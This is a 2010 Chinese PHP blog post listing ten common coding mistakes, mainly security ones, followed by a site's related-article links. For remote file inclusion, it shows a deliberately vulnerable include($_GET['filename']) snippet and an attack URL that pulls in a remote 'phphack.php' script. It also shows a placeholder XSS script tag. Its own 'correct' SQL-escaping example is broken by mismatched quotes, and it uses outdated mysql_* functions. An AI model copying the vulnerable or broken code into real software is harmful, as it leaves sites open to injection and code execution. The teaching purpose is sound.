php 编写安全的代码时容易犯的错误小结


Posted in PHP onMay 20, 2010

1.不转意html entities
一个基本的常识:所有不可信任的输入(特别是用户从form中提交的数据) ,输出之前都要转意。
echo $_GET['usename'] ;
这个例子有可能输出:
<script>/*更改admin密码的脚本或设置cookie的脚本*/</script>
这是一个明显的安全隐患,除非你保证你的用户都正确的输入。
如何修复 :
我们需要将"< ",">","and" 等转换成正确的HTML表示(< , >', and "),函数htmlspecialchars 和 htmlentities()正是干这个活的。
正确的方法:
echo htmlspecialchars($_GET['username'], ENT_QUOTES);
2. 不转意SQL输入
我曾经在一篇文章中最简单的防止sql注入的方法(php+mysql中)讨论过这个问题并给出了一个简单的方法 。有人对我说,他们已经在php.ini中将magic_quotes设置为On,所以不必担心这个问题,但是不是所有的输入都是从$_GET, $_POST或 $_COOKIE中的得到的!
如何修复:
和在最简单的防止sql注入的方法(php+mysql中)中一样我还是推荐使用mysql_real_escape_string()函数
正确做法:

<?php 
$sql = "UPDATE users SET 
name='.mysql_real_escape_string($name).' 
WHERE id='.mysql_real_escape_string ($id).'"; 
mysql_query($sql); 
?>

3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie()
遇到过这个警告吗?"warning: Cannot add header information - headers already sent [....]

每次从服务器下载一个网页的时候,服务器的输出都分成两个部分:头部和正文。
头部包含了一些非可视的数据,例如cookie。头部总是先到达。正文部分包括可视的html,图片等数据。
如果output_buffering设置为Off,所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发,而在部署到另一个环境中去的时候,output_buffering的设置可能不一样。结果转向停止了,cookie和session都没有正确的设置........。

如何修复:
确保在输出之前调用http-header相关的函数,并且令output_buffering = Off

4. Require 或 include 的文件使用不安全的数据
再次强调:不要相信不是你自己显式声明的数据。不要 Include 或 require 从$_GET, $_POST 或 $_COOKIE 中得到的文件。
例如:

index.php 
<? 
//including header, config, database connection, etc 
include($_GET['filename']); 
//including footer 
?>

现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt
来获取你的机密信息,或执行一个PHP脚本。
如果allow_url_fopen=On,你更是死定了:
试试这个输入:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php
现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。
如何修复:
你必须自己控制哪些文件可以包含在的include或require指令中。
下面是一个快速但不全面的解决方法:
<? 
//Include only files that are allowed. 
$allowedFiles = array('file1.txt','file2.txt','file3.txt'); 
if(in_array((string)$_GET['filename'],$allowedFiles)) { 
include($_GET['filename']); 
} 
else{ 
exit('not allowed'); 
} 
?>

5. 语法错误
语法错误包括所有的词法和语法错误,太常见了,以至于我不得不在这里列出。解决办法就是认真学习PHP的语法,仔细一点不要漏掉一个括号,大括号,分号,引号。还有就是换个好的编辑器,就不要用记事本了!
6.很少使用或不用面向对象
很多的项目都没有使用PHP的面向对象技术,结果就是代码的维护变得非常耗时耗力。PHP支持的面向对象技术越来越多,越来越好,我们没有理由不使用面向对象。
7. 不使用framework
95% 的PHP项目都在做同样的四件事: Create, edit, list 和delete. 现在有很多MVC的框架来帮我们完成这四件事,我们为何不使用他们呢?
8. 不知道PHP中已经有的功能
PHP的核心包含很多功能。很多程序员重复的发明轮子。浪费了大量时间。编码之前搜索一下PHP mamual,在google上检索一下,也许会有新的发现!PHP中的exec()是一个强大的函数,可以执行cmd shell,并把执行结果的最后一行以字符串的形式返回。考虑到安全可以使用EscapeShellCmd()
9.使用旧版本的PHP
很多程序员还在使用PHP4,在PHP4上开发不能充分发挥PHP的潜能,还存在一些安全的隐患。转到PHP5上来吧,并不费很多功夫。大部分PHP4程序只要改动很少的语句甚至无需改动就可以迁移到PHP5上来。根据http://www.nexen.net的调查 只有12%的PHP服务器使用PHP5,所以有88%的PHP开发者还在使用PHP4.
10.对引号做两次转意
见过网页中出现\'或\'"吗?这通常是因为在开发者的环境中magic_quotes 设置为off,而在部署的服务器上magic_quotes =on. PHP会在 GET, POST 和 COOKIE中的数据上重复运行addslashes() 。
原始文本:
It's a string

magic quotes on :
It\'s a string
又运行一次
addslashes():
It\\'s a string

HTML输出:
It\'s a string

还有一种情况就是,用户一开始输入了错误的登录信息,服务器检测到错误输入后,输出同样的form要求用户再次输入,导致用户的输入转意两次!

PHP 相关文章推荐
PHP中的正规表达式(一)
Oct 09 PHP
攻克CakePHP系列三 表单数据增删改
Oct 22 PHP
PHP面向对象分析设计的61条军规小结
Jul 17 PHP
在smarty模板中使用PHP函数的方法
Apr 23 PHP
php Hex RGB颜色值互换的使用
May 10 PHP
destoon二次开发常用数据库操作
Jun 21 PHP
基于PHP的简单采集数据入库程序【续篇】
Jul 30 PHP
PHP多维数组遍历方法(2种实现方法)
Dec 10 PHP
Laravel中日期时间处理包Carbon的简单使用
Sep 21 PHP
微信支付之JSAPI公众号支付详解
May 15 PHP
tp5.1 框架路由操作-URL生成实例分析
May 26 PHP
swoole锁的机制代码实例讲解
Mar 04 PHP
Windows7下PHP开发环境安装配置图文方法
May 20 #PHP
Joomla下利用configuration.php存储简单数据
May 19 #PHP
php UTF-8、Unicode和BOM问题
May 18 #PHP
php生成的html meta和link标记在body标签里 顶部有个空行
May 18 #PHP
PHP 工厂模式使用方法
May 18 #PHP
在PHP中使用反射技术的架构插件使用说明
May 18 #PHP
PHP 写文本日志实现代码
May 18 #PHP
You might like
咖啡的化学
2021/03/03 咖啡文化
深入分析php之面向对象
2013/05/15 PHP
php获取数组长度的方法(有实例)
2013/10/27 PHP
通过dbi使用perl连接mysql数据库的方法
2014/04/16 PHP
PHP之autoload运行机制实例分析
2014/08/28 PHP
PHP读取zip文件的方法示例
2016/11/17 PHP
js 点击按钮弹出另一页,选择值后,返回到当前页
2010/05/26 Javascript
jQuery的cookie插件实现保存用户登陆信息
2014/04/15 Javascript
对象题目的一个坑 理解Javascript对象
2015/12/22 Javascript
jquery通过name属性取值的简单实现方法
2016/06/20 Javascript
由浅入深剖析Angular表单验证
2016/07/14 Javascript
详解JS-- 浮点数运算处理
2016/11/28 Javascript
JS常见疑难点分析之match,charAt,charCodeAt,map,search用法分析
2016/12/25 Javascript
babel基本使用详解
2017/02/17 Javascript
JavaScript中递归实现的方法及其区别
2017/09/12 Javascript
js隐式转换的知识实例讲解
2018/09/28 Javascript
富文本编辑器vue2-editor实现全屏功能
2019/05/26 Javascript
[49:08]FNATIC vs Infamous 2019国际邀请赛小组赛 BO2 第二场 8.16
2019/08/18 DOTA
Python  __getattr__与__setattr__使用方法
2008/09/06 Python
Python StringIO模块实现在内存缓冲区中读写数据
2015/04/08 Python
解决Python出现_warn_unsafe_extraction问题的方法
2016/03/24 Python
使用Python对MySQL数据操作
2017/04/06 Python
Python控制台实现交互式环境执行
2020/06/09 Python
django 装饰器 检测登录状态操作
2020/07/02 Python
HTML5 3D旋转相册的实现示例
2019/12/03 HTML / CSS
挪威太阳镜和眼镜网上商城:SmartBuyGlasses挪威
2016/08/20 全球购物
美国运动鞋和运动服零售商:Footaction
2017/04/07 全球购物
毕业生的自我鉴定
2013/10/29 职场文书
应届毕业生自荐书
2014/06/18 职场文书
超市七夕促销活动方案
2014/08/28 职场文书
环卫工人慰问信
2015/02/15 职场文书
销售经理工作检讨书
2015/02/19 职场文书
让世界充满爱观后感
2015/06/10 职场文书
2016年第十四个公民道德宣传日活动总
2016/04/01 职场文书
vue数据字典取键值项目的字典问题
2022/04/12 Vue.js
Python 匹配文本并在其上一行追加文本
2022/05/11 Python